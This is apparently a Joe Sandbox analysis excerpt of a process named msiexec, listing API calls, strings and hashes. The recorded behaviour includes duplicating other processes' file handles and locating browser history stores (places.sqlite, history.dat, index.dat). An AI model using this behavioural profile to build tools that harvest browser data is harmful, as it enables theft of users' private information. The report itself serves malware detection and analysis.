                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                    APIs
                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$memcmp
                                                    • String ID: $$8
                                                    • API String ID: 2808797137-435121686
                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                    APIs
                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                    • String ID:
                                                    • API String ID: 1979745280-0
                                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                    APIs
                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                    • memset.MSVCRT ref: 00414C87
                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProcVersionmemsetwcscpy
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                    • API String ID: 4182280571-2036018995
                                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                    APIs
                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                    • memset.MSVCRT ref: 00403A55
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                    • String ID: history.dat$places.sqlite
                                                    • API String ID: 2641622041-467022611
                                                    • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                    • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                    APIs
                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                    • GetLastError.KERNEL32 ref: 00417627
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$File$PointerRead
                                                    • String ID:
                                                    • API String ID: 839530781-0
                                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID: *.*$index.dat
                                                    • API String ID: 1974802433-2863569691
                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FilePointer
                                                    • String ID:
                                                    • API String ID: 1156039329-0
                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                    • String ID:
                                                    • API String ID: 1125800050-0
                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                    APIs
                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                    • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleSleep
                                                    • String ID: }A
                                                    • API String ID: 252777609-2138825249
                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                    APIs
                                                    • malloc.MSVCRT ref: 00409A10
                                                    • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                    • free.MSVCRT ref: 00409A31
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: freemallocmemcpy
                                                    • String ID:
                                                    • API String ID: 3056473165-0
                                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d
                                                    • API String ID: 0-2564639436
                                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: BINARY
                                                    • API String ID: 2221118986-907554435
                                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: /stext
                                                    • API String ID: 2081463915-3817206916
                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: .Wu
                                                    • API String ID: 2081463915-3424199868
                                                    • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                    • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                    APIs
                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                    • String ID:
                                                    • API String ID: 2445788494-0
                                                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                    APIs
                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                    • String ID:
                                                    • API String ID: 3150196962-0
                                                    • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                    • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                    APIs
                                                    Strings
                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: malloc
                                                    • String ID: failed to allocate %u bytes of memory
                                                    • API String ID: 2803490479-1168259600
                                                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                    APIs
                                                    • memset.MSVCRT ref: 0041BDDF
                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcmpmemset
                                                    • String ID:
                                                    • API String ID: 1065087418-0
                                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                    APIs
                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                    • CloseHandle.KERNELBASE(?), ref: 00410654
                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                    • String ID:
                                                    • API String ID: 1381354015-0
                                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                    APIs
                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                    • String ID:
                                                    • API String ID: 2154303073-0
                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                    APIs
                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
